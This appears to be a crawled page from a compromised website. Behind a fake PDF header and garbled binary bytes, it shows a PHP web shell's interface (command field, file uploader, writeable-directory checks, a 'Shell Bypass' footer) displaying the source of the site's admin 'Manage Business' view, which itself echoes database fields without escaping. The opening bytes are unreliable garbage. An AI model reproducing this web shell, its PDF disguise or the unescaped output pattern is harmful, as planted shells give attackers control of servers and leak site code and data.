%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/agusttya.com/application/modules/admin/views/managebusiness/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/agusttya.com/application/modules/admin/views/managebusiness/managebusiness.php
<div id="content-wrapper">
       <div class="container-fluid">

          <!-- Breadcrumbs-->
          <ol class="breadcrumb">
            <li class="breadcrumb-item">
              <a href="<?php echo site_url('admin/home'); ?>">Dashboard</a>
            </li>
            <li class="breadcrumb-item active">Manage Business</li>
          </ol>

          <!-- DataTables Example -->
		  
		  <div class="card mb-3 fomr-news">
            <div class="card-header card-header-new"><h3> <i class="fas fa-table"></i> Business Details </h3> <a href="<?=base_url('admin/managebusiness/addbusiness')?>"> <input type="button" name="button" id="button" value="Add Business"></a></a> &nbsp; <a href="<?=base_url('admin/managebusiness/managecategory')?>"> <input type="button" name="button" id="button" value="Add Catgeory"></a></a> &nbsp; </div> 
	     </div> 


            <div class="card-body">
              <div class="table-responsive">
				<!---- Success Message ---->
				<?php if ($this->session->flashdata('success')) { ?>
				<p style="color:green; font-size:18px;"><?php echo $this->session->flashdata('success'); ?></p>
				</div>
				<?php } ?>
                
                <table class="table table-bordered" id="dataTable" width="100%" cellspacing="0">
                  <thead>
                    <tr>
                    <th>#</th>
                      <th>Image</th>
                      <th>Name</th>
                      <th>Title</th>
                      <th>Category</th>
                      <th>Address</th>
                      <th>Short Description</th>
                      <th>Description</th>
                      <th>Display Order</th>
                      <th>Status</th>
                      <th>Action</th>
                    </tr>
                  </thead>
                  <tfoot>
                      <tr>
                      <th>#</th>
                      <th>Image</th>
                      <th>Name</th>
                      <th>Title</th>
                      <th>Category</th>
                      <th>Address</th>
                      <th>Short Description</th>
                      <th>Description</th>
                      <th>Display Order</th>
                      <th>Status</th>
                      <th>Action</th>
                    </tr>
                  </tfoot>
                  <tbody>

				<?php
				if(count($businesses)) :
				$cnt=1; 
				foreach ($businesses as $row) :
				?>                    
                    <tr>
						<td><?php echo htmlentities($cnt);?></td>
                        <td><img src="<?=base_url('attachments/business_images/'.$row['business_image'])?>" style="width:40px;"></td>
                        <td><?php echo $row['name']?></td>
                        <td><?php echo $row['title']?></td>
                        <td><?php echo $categoryArray['category'][$row['category']]?></td>
                        <td><?php echo $row['address']?></td>
                        <td><?php echo $row['short_description']?></td>
                        <td><?php echo $row['description']?></td>
                        <td><?php echo $row['display_order']?></td>
						<td><?php echo $row['status']=='1' ? 'Active' : 'Inactive'?></td>
						<td>
                                <a href="<?=base_url('admin/managebusiness/addbusiness?edit='.$row['id'])?>"><span class="fa fa-edit"></span></a>
                                <a href="<?=base_url('admin/managebusiness?delete='.$row['id'])?>" class="confirm-delete"><span class="fa fa-trash confirm-delete"></span></a>
                        </td>
                    </tr>
				 <?php 
				$cnt++;
				endforeach;
				else : ?>

				<tr>
				<td colspan="9">No Record found</td>
				</tr>
				<?php
				endif;
				?>                
              
        
                  </tbody>
                </table>
            </div>

          </div>


        </div>
        <!-- /.container-fluid -->

        <!-- Sticky Footer -->


Kontol Shell Bypass